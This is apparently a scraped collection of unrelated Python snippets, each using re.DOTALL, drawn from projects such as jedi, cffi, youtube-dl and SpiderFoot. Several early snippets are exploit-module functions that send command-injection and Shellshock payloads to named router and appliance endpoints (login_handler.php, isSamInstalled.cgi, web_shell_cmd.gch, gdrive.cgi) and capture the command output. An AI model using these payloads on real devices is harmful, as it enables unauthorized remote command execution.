def cache_call_signatures(evaluator, bracket_leaf, code_lines, user_pos):
"""This function calculates the cache key."""
index = user_pos[0] - 1
before_cursor = code_lines[index][:user_pos[1]]
other_lines = code_lines[bracket_leaf.start_pos[0]:index]
whole = '\n'.join(other_lines + [before_cursor])
before_bracket = re.match(r'.*\(', whole, re.DOTALL)
module_path = bracket_leaf.get_parent_until().path
if module_path is None:
yield None # Don't cache!
else:
yield (module_path, before_bracket, bracket_leaf.start_pos)
yield evaluate_goto_definition(
evaluator,
bracket_leaf.get_previous_leaf()
)
python类DOTALL的实例源码
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/login_handler.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return ""
if mark in response.text:
regexp = "%s(|.+?)%s" % (mark, mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
marker = random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
return
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
else:
return ""
def execute(self, cmd):
url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
headers = {u'Content-Type': u'multipart/form-data'}
data = {'IF_ACTION': 'apply',
'IF_ERRORSTR': 'SUCC',
'IF_ERRORPARAM': 'SUCC',
'IF_ERRORTYPE': '-1',
'Cmd': cmd,
'CmdAck': ''}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if response.status_code == 200:
regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
response = http_request(method="GET", url=url)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def setup_module():
import cffi.verifier
cffi.verifier.cleanup_tmpdir()
#
# check that no $ sign is produced in the C file; it used to be the
# case that anonymous enums would produce '$enum_$1', which was
# used as part of a function name. GCC accepts such names, but it's
# apparently non-standard.
_r_comment = re.compile(r"/\*.*?\*/|//.*?$", re.DOTALL | re.MULTILINE)
_r_string = re.compile(r'\".*?\"')
def _write_source_and_check(self, file=None):
base_write_source(self, file)
if file is None:
f = open(self.sourcefilename)
data = f.read()
f.close()
data = _r_comment.sub(' ', data)
data = _r_string.sub('"skipped"', data)
assert '$' not in data
base_write_source = cffi.verifier.Verifier._write_source
cffi.verifier.Verifier._write_source = _write_source_and_check
def add_head(text):
"""Add head html from template """
head = open(PATH_TO_TEMPLATE_HTML).read()
head = head.replace('{{ url_index }}', PATH_TO_HTML + '/' + 'index.html')
head = head.replace('href="img/', 'href="' + PATH_TO_TEMPLATE + '/img/')
head = head.replace('="lib/', '="' + PATH_TO_TEMPLATE + '/lib/')
head = head.replace('="css/', '="' + PATH_TO_TEMPLATE + '/css/')
head = head.replace('="js/', '="' + PATH_TO_TEMPLATE + '/js/')
# remove demo content
head = re.sub(r'<!-- start of demo -->.*<!-- end of demo -->',
r'', head, flags=re.M | re.DOTALL)
return head + text
#head_new = ''
# for l in head.split('\n'):
# if l.find('href="http://') > -1 or l.find('src="http://') > -1 or l.find('href="#') > -1:
# head_new += l
# else:
# l = l.replace('href=', 'href="' + PATH_TO_TEMPLATE + '"')
# l = l.replace('src=', 'src="' + PATH_TO_TEMPLATE + '"')
# head_new += l
# return head + text
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
music_id = mobj.group('id')
webpage = self._download_webpage(url, music_id)
title = self._html_search_regex(
r'<div id="single_sample_header">.*?<a href="#">(.+?)</a>',
webpage, 'music title', flags=re.DOTALL)
description = self._html_search_regex(
r'<div id="sound_description">(.*?)</div>', webpage, 'description',
fatal=False, flags=re.DOTALL)
return {
'id': music_id,
'title': title,
'url': self._og_search_property('audio', webpage, 'music url'),
'uploader': self._og_search_property('audio:artist', webpage, 'music uploader'),
'description': description,
}
def _title_and_entries(self, list_id, base_url):
for pagenum in itertools.count(1):
page_url = self._page_url(base_url, pagenum)
webpage = self._download_webpage(
page_url, list_id,
'Downloading page %s' % pagenum)
if pagenum == 1:
webpage = self._login_list_password(page_url, list_id, webpage)
yield self._extract_list_title(webpage)
for video_id in re.findall(r'id="clip_(\d+?)"', webpage):
yield self.url_result('https://vimeo.com/%s' % video_id, 'Vimeo')
if re.search(self._MORE_PAGES_INDICATOR, webpage, re.DOTALL) is None:
break
def find_links(file):
"""Find all markdown links in a file object.
Yield (lineno, regexmatch) tuples.
"""
# don't yield same link twice
seen = set()
# we need to loop over the file two lines at a time to support
# multi-line (actually two-line) links, so this is kind of a mess
firsts, seconds = itertools.tee(file)
next(seconds) # first line is never second line
# we want 1-based indexing instead of 0-based and one-line links get
# caught from linepair[1], so we need to start at two
for lineno, linepair in enumerate(zip(firsts, seconds), start=2):
lines = linepair[0] + linepair[1]
for match in re.finditer(_LINK_REGEX, lines, flags=re.DOTALL):
if match.group(0) not in seen:
seen.add(match.group(0))
yield match, lineno
def writeJson(self, inner_path, data):
content = json.dumps(data, indent=1, sort_keys=True)
# Make it a little more compact by removing unnecessary white space
def compact_list(match):
return "[ " + match.group(1).strip() + " ]"
def compact_dict(match):
return "{ " + match.group(1).strip() + " }"
content = re.sub("\[([^,\{\[]{10,100}?)\]", compact_list, content, flags=re.DOTALL)
content = re.sub("\{([^,\[\{]{10,100}?)\}", compact_dict, content, flags=re.DOTALL)
# Write to disk
self.write(inner_path, content)
# Get file size
def getOfflineMediaList(self, folderName=False, title=False, contentType=7):
mediaFiles = []
for r1 in re.finditer('\{(.*?)\"spaces\"\:' , entryS, re.DOTALL):
entry = r1.group(1)
media = self.getMediaPackage(entry, folderName=folderName, contentType=contentType, fanart=folderFanart, icon=folderIcon)
if media is not None:
mediaFiles.append(media)
return mediaFiles
##
# retrieve a list of videos, using playback type stream
# parameters: prompt for video quality (optional), cache type (optional)
# returns: list of videos
##
def transform_template(self, obj):
if obj["name"].startswith("#lst:"):
article_name = remove_prefix(obj["name"], "#lst:")
article = self.api.get_content(article_name)
section_name = obj["params"]["1"]
begin = r"\<section\s+begin\=[\"']?" + re.escape(section_name) + \
r"[\"']?\s*\/>"
end = r"\<section\s+end\=[\"']?" + re.escape(section_name) + \
r"[\"']?\s*\/\>"
section = re.search(begin + "(.*)" + end, article, re.DOTALL)
if section:
section = section.group(1).strip()
content = parse_content(self.api, self.title, section)
return {"type": "included_section", "content": content}
else:
message = "section '{}' of '{}' cannot be included" \
.format(section_name, article_name)
return {"type": "error", "message": message}
else:
raise NotInterested()
def contentMalicious(self, content, goodregex, badregex):
# First, check for the bad indicators
if len(badregex) > 0:
for rx in badregex:
if re.match(rx, content, re.IGNORECASE | re.DOTALL):
self.sf.debug("Found to be bad against bad regex: " + rx)
return True
# Finally, check for good indicators
if len(goodregex) > 0:
for rx in goodregex:
if re.match(rx, content, re.IGNORECASE | re.DOTALL):
self.sf.debug("Found to be good againt good regex: " + rx)
return False
# If nothing was matched, reply None
self.sf.debug("Neither good nor bad, unknown.")
return None
# Look up 'query' type sources
def get_action_dirlist(driverpath):
""" Get the list of action directories
"""
actions_package_list = []
try:
if os.path.isfile(driverpath):
with open(driverpath, 'r') as fobj:
drv_text = fobj.read()
search_string = re.compile('package_list.*=.*\]',
re.DOTALL | re.MULTILINE)
match = re.search(search_string, drv_text)
if match:
match_string = match.group()
# extracting the text within [] and get the list of packages separated by ,
actions_package_list = re.findall(r'\[(.*)\]', match_string)[0].split(',')
print "\n actions package list: ", actions_package_list
else:
print "file {0} does not exist".format(driverpath)
except Exception, e:
print str(e)
return actions_package_list
def get_action_dirlist(driverpath):
""" Get the list of action directories """
actions_package_list = []
try:
if os.path.isfile(driverpath):
lines = []
with open(driverpath, 'r') as fobj:
lines = fobj.readlines()
lines_as_string = ''.join(lines)
search_string = re.compile(r'package_list.*=.*\]', re.DOTALL|re.MULTILINE)
match = re.search(search_string, lines_as_string)
if match:
match_string = match.group()
actions_package_list = match_string.split('[')[1].split(']')[0].split(',')
return actions_package_list
else:
print("file {0} does not exist".format(driverpath))
return actions_package_list
except Exception as exception:
print_exception(exception)
return actions_package_list
def get_history(self, addr):
out = []
o = self.listunspent(addr)
for item in o:
out.append((item['height'], item['tx_hash']))
h = self.db_hist.get(addr)
if h:
for item in re.findall('.{80}', h, flags=re.DOTALL):
txi = item[0:32].encode('hex')
hi = hex_to_int(item[36:40])
txo = item[40:72].encode('hex')
ho = hex_to_int(item[76:80])
out.append((hi, txi))
out.append((ho, txo))
# uniqueness
out = set(out)
# sort by height then tx_hash
out = sorted(out)
return map(lambda x: {'height': x[0], 'tx_hash': x[1]}, out)
def scanner(cls):
if not getattr(cls, '_scanner', None):
def h(tpe):
return lambda sc, tk: cls.Token(tpe, tk)
cls._scanner = re.Scanner([
(r"(--|//).*?$", h(cls.LINE_COMMENT)),
(r"\/\*.+?\*\/", h(cls.BLOCK_COMMENT)),
(r'"(?:[^"\\]|\\.)*"', h(cls.STRING)),
(r"'(?:[^'\\]|\\.)*'", h(cls.STRING)),
(r"\$\$(?:[^\$\\]|\\.)*\$\$", h(cls.STRING)),
(r";", h(cls.SEMICOLON)),
(r"\s+", h(cls.WHITESPACE)),
(r".", h(cls.OTHER))
], re.MULTILINE | re.DOTALL)
return cls._scanner